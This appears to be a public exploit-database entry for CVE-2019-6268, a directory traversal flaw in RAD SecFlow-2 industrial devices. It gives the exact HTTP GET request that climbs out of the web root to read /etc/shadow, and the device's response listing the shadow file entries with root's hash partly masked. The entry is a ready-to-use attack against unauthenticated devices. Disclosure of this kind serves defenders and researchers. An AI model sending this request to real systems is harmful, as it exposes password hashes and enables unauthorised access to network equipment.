Share
## https://sploitus.com/exploit?id=PACKETSTORM:177440
# Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63  
# Date: 3/2024  
# CVE: CVE-2019-6268  
# Exploit Author: Branko Milicevic  
  
RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.  
  
Steps to reproduce:  
  
Request:  
GET /../../../../../../../../../../etc/shadow HTTP/1.1  
  
Response:  
HTTP/1.1 200 OK  
  
root:nDnjJ****ydh3:11851:0:99999:7:::  
bin:*:11851:0:99999:7:::  
daemon:*:11851:0:99999:7:::  
adm:*:11851:0:99999:7:::  
lp:*:11851:0:99999:7:::  
sync:*:11851:0:99999:7:::  
shutdown:*:11851:0:99999:7:::  
Vulnerability Type  
Directory Traversal  
  
Attack Vectors  
Unauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).  
  
Reference  
https://www.owasp.org/index.php/Path_Traversal